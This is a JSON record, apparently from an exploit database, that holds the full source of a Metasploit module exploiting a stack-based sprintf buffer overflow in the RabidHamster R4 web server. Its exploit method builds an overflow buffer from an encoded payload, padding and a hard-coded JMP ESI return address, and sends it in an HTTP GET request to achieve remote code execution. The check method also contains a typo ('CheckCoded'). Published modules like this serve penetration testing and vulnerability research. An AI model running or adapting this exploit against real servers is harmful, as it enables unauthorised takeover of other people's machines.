{"hash": "d7a1dfadb58eca30303a837cc81a62480feeafce565d3312cb38e267ec663feb", "id": "EDB-ID:18929", "lastseen": "2016-02-02T10:43:42", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/18929/", "description": "RabidHamster R4 Log Entry sprintf() Buffer Overflow. Remote exploit for windows platform", "title": "RabidHamster R4 Log Entry sprintf Buffer Overflow", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"RabidHamster R4 Log Entry sprintf() Buffer Overflow\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in RabidHamster R4's web server.\r\n\t\t\t\tBy supplying a malformed HTTP request, it is possible to trigger a stack-based\r\n\t\t\t\tbuffer overflow when generating a log, which may result in arbitrary code\r\n\t\t\t\texecution under the context of the user.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Luigi Auriemma', #Discovery, PoC\r\n\t\t\t\t\t'sinn3r' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['OSVDB', '79007'],\r\n\t\t\t\t\t['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],\r\n\t\t\t\t\t['URL', 'http://secunia.com/advisories/47901/']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'BadChars' => \"\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x20\"\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"process\"\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['R4 v1.25', {'Ret'=>0x73790533}] #JMP ESI (ddraw.dll)\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Feb 09 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptPort.new('RPORT', [true, 'The remote port', 8888])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => '/'\r\n\t\t})\r\n\r\n\t\tif res and res.headers['Server'] == 'R4 Embedded Server'\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCoded::Safe\r\n\t\tend\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tbuf = ''\r\n\t\tbuf << payload.encoded\r\n\t\tbuf << rand_text_alpha(2022-buf.length, payload_badchars)\r\n\t\tbuf << [target.ret].pack(\"V*\")\r\n\t\tbuf << pattern_create(200)\r\n\t\tbuf << rand_text_alpha(3000-buf.length, payload_badchars)\r\n\r\n\t\tsend_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => \"/?#{buf}\"\r\n\t\t})\r\n\tend\r\nend\r\n", "objectVersion": "1.0", "cvelist": [], "published": "2012-05-25T00:00:00", "osvdbidlist": ["79007"], "references": [], "reporter": "metasploit", "modified": "2012-05-25T00:00:00", "href": "https://www.exploit-db.com/exploits/18929/"}

{"result": {}}